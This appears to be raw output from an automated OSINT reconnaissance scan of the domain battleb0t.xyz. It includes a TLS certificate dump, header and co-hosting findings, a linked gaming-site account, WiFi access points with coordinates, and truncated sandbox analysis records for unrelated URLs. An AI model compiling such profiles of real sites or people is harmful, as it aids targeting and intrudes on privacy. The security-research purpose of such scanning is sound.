9d:cf:f4:1c:87:80:7b:03:c4:11:f8:c8:fe:1d:fd:
d9:21:53:2a:ab:a4:e1:88:2f:4b:5d:2f:ee:62:ac:
58:24:c3:6b:51:75:98:92:28:85:71:19:cf:1f:32:
bf:04:e0:46:cb:6a:6e:1a:53:77:bb:51:7b:25:a8:
3b:79:a4:fe:31:da:29:cb:94:14:d8:b7:bf:23:48:
40:7c:38:77:e2:71:aa:43:c0:dd:58:a7:d1:0f:28:
19:e1:e9:99:2b:f4:ba:45:c8:6a:f8:d6:7a:86:7e:
a9:1e:96:ed:9c:c8:12:b9:05:83:95:70:08:f4:a3:
69:c3:37:93:d6:82:c5:85:91:d6:07:1b:87:31:af:
f4:29:c3:da:2f:cb:d0:72:02:68:65:19:d7:78:65:
82:75:d2:3a:e3:90:30:94:d9:d7:ad:e9:8d:db:16:
21:a3:69
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
40:6C:27:E5:F5:7A:53:84:B0:9C:FE:C0:1C:53:80:B3:F8:A3:C2:C8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
31:e8:ef:7b:dc:32:84:dd:2e:cc:16:1c:67:37:d9:86:76:04:
cf:c1:4a:db:fc:f8:35:75:ae:c3:16:b4:0f:be:85:8b:2e:20:
db:eb:90:53:b8:18:4d:ef:7f:9f:02:58:b1:11:60:70:ce:ed:
48:d1:03:e8:96:d0:08:23:48:86:a6:a1:dd:67:5c:22:34:8f:
7b:e9:55:8c:27:c1:a3:38:4d:9e:0d:fe:62:f2:2a:c2:c8:2a:
7f:a8:e9:c9:39:5d:dd:14:84:0b:ca:c2:43:a5:28:2d:bf:3e:
df:33:fa:93:d0:d2:25:aa:bf:96:26:a0:e2:28:49:c3:01:f6:
1b:1f:83:32:9b:6e:57:55:9b:b2:74:7a:0d:c6:40:a1:6f:35:
c4:08:94:e4:ae:84:9e:57:8b:d7:39:a4:95:6f:4e:9a:ff:c5:
d4:c6:a2:ec:49:72:ad:a2:fe:9d:76:83:15:0f:a5:d6:70:72:
bc:54:bb:e6:d0:4d:78:23:d8:86:e5:91:24:e1:d6:5c:9f:c0:
4f:96:79:66:56:47:4e:a5:83:46:6a:88:fc:1a:f6:c8:24:7e:
cc:fc:53:86:95:72:5f:4e:3c:48:0d:0e:f3:6a:43:f6:6b:fb:
f5:6b:36:26:89:53:4a:22:4b:a7:9e:de:e2:c4:fb:85:8c:ca:
ff:01:95:cd
| battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | lichess (Category: gaming)
https://lichess.org/@/Altpapier | Altpapier |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 00rz.com | 185.199.111.153 |
| 2023-05-12 02:44:12 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz:443 | kekw.battleb0t.xyz |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00ihsan.github.io |
| 2023-05-12 03:09:56 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.107 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:26:FB:66) | 50.8897, 6.0563 |
| 2023-05-12 02:55:21 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 207.154.228.169 |
| 2023-05-12 02:57:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.ibisci.com/products/the-spin-dr-tube-rotator?_kx=rArS9TiHUjbjdmctgTFbGX5zPWSKroNH9JEvdKqW-A8%3D.MenwDE&_pos=1&_sid=e69e48d55&_ss=r&utm_campaign=10.26.22%20-%20Spin%20Dr%20Video%20-%20resend%20%282022-10-26%29&utm_medium=email&utm_source=Subscribers%20%28Customers%20and%20non-customers%29&variation=B', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "easyredirects.esc-apps-cdn.com"\n "in.visitors.live"\n "monorail-edge.shopifysvc.com"\n "nexusmedia-ua.github.io"\n "productreviews.shopifycdn.com"\n "qab.hextom.com"\n "settings.luckyorange.net"\n "static.klaviyo.com"\n "visitors.live"\n "www.ibisci.com"\n "www.pxucdn.com"\n "www.webyze.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b54_IESQMMUTEX_0_331"\n "IsoScope_b54_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_b54_ConnHashTable<2900>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b54_IE_EarlyTabStart_0xc9c_Mutex"\n "IsoScope_b54_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2900"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b54_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2900"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.74:443"\n "172.217.14.202:443"\n "104.17.24.14:443"\n "162.159.134.68:443"\n "142.251.33.106:443"\n "157.240.11.22:443"\n "172.67.176.77:443"\n "99.84.160.19:443"\n "35.229.48.116:443"\n "162.159.129.71:443"\n "142.251.211.238:443"\n "142.251.33.99:443"\n "142.250.217.110:443"\n "162.159.128.61:443"\n "108.177.98.156:443"\n "157.240.22.35:443"\n "157.240.19.26:443"\n "142.251.215.226:443"\n "142.250.217.70:443"\n "142.250.69.202:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"OPTIONS /v1/produce HTTP/1.1\nAccept: */*\nOrigin: https://www.ibisci.com\nAccess-Control-Request-Method: POST\nAccess-Control-Request-Headers: content-type, x-monorail-edge-event-created-at-ms, x-monorail-edge-event-sent-at-ms, x-monorail-edge-client-message-id\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: monorail-edge.shopifysvc.com\nContent-Length: 0\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "mozilla/5.0 (")\n "OPTIONS /v1/produce HTTP/1.1\nAccept: */*\nOrigin: https://www.ibisci.com\nAccess-Control-Request-Method: POST\nAccess-Control-Request-Headers: content-type, x-monorail-edge-event-created-at-ms, x-monorail-edge-event-sent-at-ms, x-monorail-edge-client-message-id\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: monorail-edge.shopifysvc.com\nContent-Length: 0\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "ico-select_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "DGO9NSMD.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DGO9NSMD.txt]- [targetUID: 00000000-00003472]\n Dropped file: "1VA8H6BS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1VA8H6BS.txt]- [targetUID: 00000000-00003472]\n Dropped file: "0498SS82.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0498SS82.txt]- [targetUID: 00000000-00003472]\n Dropped file: "6KP44WX2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6KP44WX2.txt]- [targetUID: 00000000-00003472]\n Dropped file: "TUSAGTC5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TUSAGTC5.txt]- [targetUID: 00000000-00003472]\n Dropped file: "0OK814S0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0OK814S0.txt]- [targetUID: 00000000-00003472]\n Dropped file: "IIHQ6SXU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IIHQ6SXU.txt]- [targetUID: 00000000-00003472]\n Dropped file: "PH9G2FHJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PH9G2FHJ.txt]- [targetUID: 00000000-00003472]\n Dropped file: "I6CSGOEU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I6CSGOEU.txt]- [targetUID: 00000000-00003472]\n Dropped file: "DEQJIGN0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEQJIGN0.txt]- [targetUID: 00000000-00003472]\n Dropped file: "M3C24UT9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\M3C24UT9.txt]- [targetUID: 00000000-00003472]\n Dropped file: "1DZSACRQ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1DZSACRQ.txt]- [targetUID: 00000000-00002900]\n Dropped file: "N2ZHOFKO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N2ZHOFKO.txt]- [targetUID: 00000000-00003472]\n Dropped file: "JOLQ4AQW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JOLQ4AQW.txt]- [targetUID: 00000000-00002900]\n Dropped file: "AHRPUVQ6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AHRPUVQ6.txt]- [targetUID: 00000000-00003472]\n Dropped file: "GZU861O0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GZU861O0.txt]- [targetUID: 00000000-00002900]\n Dropped file: "E224X9V7.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E224X9V7.txt]- [targetUID: 00000000-00003472]\n Dropped file: "174K5ZBL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\174K5ZBL.txt]- [targetUID: 00000000-00003472]\n Dropped file: "S72TZKDN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S72TZKDN.txt]- [targetUID: 00000000-00003472]\n Dropped file: "6X6VOHU1.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6X6VOHU1.txt]- [targetUID: 00000000-00003472]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ico-select_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "fa-brands-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Brands Regular family"- [targetUID: N/A]\n "~DFC1AED41D8959E534.TMP" has type "data"- Location: [%TEMP%\\~DFC1AED41D8959E534.TMP]- [targetUID: 00000000-00002900]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKsOdC5_1_.woff" has type "Web Open Font Format TrueType length 18780 version 1.1"- [targetUID: N/A]\n "loader.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003472]\n "81RaFmcXTxQ_1_.htm" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "api.jquery-e94e010e92e659b566dbc436fdfe5242764380e00398907a14955ba301a4749f_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "theme_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "runtime.6f327cecec4e163f5a57_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0feC9hpk_1_.woff" has type "Web Open Font Format TrueType length 19932 version 1.1"- [targetUID: N/A]\n "7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKcPQ_1_.woff" has type "Web Open Font Format TrueType length 49556 version 1.1"- [targetUID: N/A]\n "quickannouncementbar_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_5CA64D21-554D-11ED-BB16-0800275E5654_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "trekkie.storefront.959f71dbd7e992c48a2a5941c6de2c0cf3fc27c6.min | 35.229.48.116 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 2 | 0 | 1 | 0 | None | https://ayhu.xyz/ | ayhu.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | infoworld (Net ID: 00:02:2D:01:DD:9B) | 37.7813933,-122.3918002 |
| 2023-05-12 03:41:58 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | domixo-hosting.de | 45.131.109.62 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-version: 1432-d48eaba | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F1:C3:85) | 37.780462,-122.390564 |
| 2023-05-12 02:49:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://k8slens.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:5528:304:WilStaging_02"\n "Local\\SM0:5528:120:WilError_01"\n "SM0:5528:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:3984:304:WilStaging_02"\n "SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3984:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.191.74:443"\n "142.251.214.131:443"\n "172.217.12.104:443"\n "34.248.78.39:443"\n "192.30.255.117:443"\n "142.251.46.174:443"\n "104.254.151.69:443"\n "142.250.141.157:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.k8slens.dev"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003984]\n "f_00024d" has type "Web Open Font Format (Version 2) TrueType length 25036 version 1.0"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006748]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003984]\n "f_00023e" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "Session_13324055852125015" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "PNG image data 500 x 500 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006748]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003984]\n "Last Browser" has type "data"- [targetUID: N/A]\n "6d3ef7fa-ecc8-4cf2-87b4-e82371405c12.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "temp-index" has type "data"- [targetUID: N/A]\n "627c3a7f-c957-4f31-952c-cbc35428ddc2.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "data_1" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006748]\n "f4af993c-e56b-444e-bf40-1281122cb7b5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "data_0" has type "FoxPro FPT blocks size 512 next free block index 3284796609 field type 0 dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006748]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\LOG]- [targetUID: 00000000-00003984]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://k8slens.dev/"\n Pattern match: "https://k8slens.dev"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"\n Pattern match: "https://fonts.googleapis.com,supports_spdy:true},{anonymization:[],server:https://edge.microsoft.com,supports_spdy:true},{alternative_service:[{advertised_alpns:[h3],expiration:13326647883143133,port:443,protocol_str:quic}],anon"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.251.214.131"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n "192.168.243.25"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}], u'threat_level': 0, u'size': None, u'job_id': u'641c62f03e70d209d706b9d4', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent' | 185.199.110.153 |
